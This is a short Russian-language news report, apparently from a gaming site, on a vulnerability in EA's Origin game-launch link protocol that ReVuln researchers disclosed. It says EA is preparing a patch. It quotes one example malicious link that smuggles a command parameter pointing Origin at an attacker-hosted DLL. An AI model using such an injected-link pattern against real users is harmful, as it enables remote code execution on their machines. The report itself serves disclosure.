Обнаружена крупная брешь в безопасности Origin
Серьезная брешь в системе безопасности была обнаружена в протоколе Origin, который используется для запуска игр через кастомные линки с использованием структуры origin. Ars Technica сообщает, что группа инженеров ReVuln продемонстрировала то, как вредоносные программы могут запускаться при помощи модифицированных ссылок Origin скрытых под видом запуска игры.
В обычной ситуации, игра Origin вызывает комманду "origin://LaunchGame/[GameID]" при запуске чего-либо через браузер. По словам инженеров ReVuln, взломщики могут просто модифицировать путь к чему-то вроде "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll", для заражения команды, заставляя запускать внешний DLL.
В дополнении к этому было опубликовано видео демонстрирующее брешь.
EA сообщает, что уже приступила к решению проблемы и патч будет выпущен уже в ближайшее время.
- Глава EA заявил, что генеративный ИИ — в самом сердце бизнеса компании, правда, что-то подобное было и про NFT
- EA планирует сделать игровых персонажей "живыми" с помощью ИИ
- Боссы EA заработали $60 млн в прошлом финансовом году — спасибо увольнениям сотрудников
